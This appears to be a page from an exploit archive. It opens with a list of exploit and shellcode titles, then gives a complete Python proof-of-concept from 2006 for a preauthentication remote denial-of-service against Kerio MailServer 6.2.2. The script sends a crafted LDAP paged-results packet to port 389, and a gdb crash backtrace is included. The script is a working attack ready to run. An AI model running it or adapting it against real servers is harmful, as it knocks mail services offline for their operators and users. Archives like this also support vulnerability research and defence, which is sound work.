
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
77 lines
No EOL
2.9 KiB
Python
Executable file
77 lines
No EOL
2.9 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/21091/info
|
|
|
|
Kerio MailServer is prone to a denial-of-service vulnerability due to a flaw when handling malformed network traffic.
|
|
|
|
Successful exploits will result in denial-of-service conditions.
|
|
|
|
#!/usr/bin/env python
|
|
# kms1.py - Kerio MailServer 6.2.2 preauth remote DoS
|
|
# fixed in Kerio MailServer 6.3.1
|
|
#
|
|
# Copyright (c) 2006 Evgeny Legerov
|
|
#
|
|
# Permission to use, copy, modify, and distribute this software for any
|
|
# purpose with or without fee is hereby granted, provided that the above
|
|
# copyright notice and this permission notice appear in all copies.
|
|
#
|
|
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
|
|
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
|
|
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
|
|
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
|
|
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
|
|
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
|
|
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
|
|
|
|
|
|
"""
|
|
gdb backtrace:
|
|
# gdb -q ./mailserver core.18450
|
|
(no debugging symbols found)
|
|
Using host libthread_db library "/lib/libthread_db.so.1".
|
|
Reading symbols from shared object read from target memory...(no debugging
|
|
symbols found)...done.
|
|
Loaded system supplied DSO at 0xb76000
|
|
Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'.
|
|
Program terminated with signal 11, Segmentation fault.
|
|
...
|
|
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
|
|
Loaded symbols for /lib/ld-linux.so.2
|
|
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
|
|
(gdb) bt
|
|
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
|
|
#1 0x0821c387 in LDAPSearchRequest::setAll ()
|
|
#2 0x08093d8a in Ber::getSearchRequest ()
|
|
#3 0x08205e48 in LDAPServer::search ()
|
|
#4 0x08207de0 in LDAPServer::server ()
|
|
#5 0x08207e2e in ldap_handler ()
|
|
#6 0x0841be13 in KServerTask::handler ()
|
|
#7 0x082033c6 in KThreadPool::workerThread ()
|
|
#8 0x086ee7b6 in kerio::tiny::thread ()
|
|
#9 0x00772b80 in start_thread () from /lib/libpthread.so.0
|
|
#10 0x00558dee in clone () from /lib/libc.so.6
|
|
(gdb) x/i $eip
|
|
0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>:
|
|
mov (%eax),%edx
|
|
(gdb) i r eax
|
|
eax 0x449 1097
|
|
"""
|
|
|
|
from socket import *
|
|
|
|
host = "localhost"
|
|
port = 389
|
|
|
|
s = "\x30\x82\x04\x4d\x02\x01\x26\x63\x82\x04\x46\x04\x00\x0a\x01\x02"
|
|
s += "\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62"
|
|
s += "\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00\xa0\x82\x04"
|
|
s += "\x20\x30\x82\x04\x1c"
|
|
s += "\x01"*1024
|
|
s += "\x16\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x31"
|
|
s += "\x33\x35\x35\x36\x2e\x31\x2e\x34\x2e\x34\x37\x33\x01\x01\x00\x04"
|
|
s += "\x00"
|
|
|
|
sock = socket(AF_INET, SOCK_STREAM)
|
|
sock.connect((host,port))
|
|
sock.sendall(s)
|
|
sock.recv(10000)
|
|
sock.close() |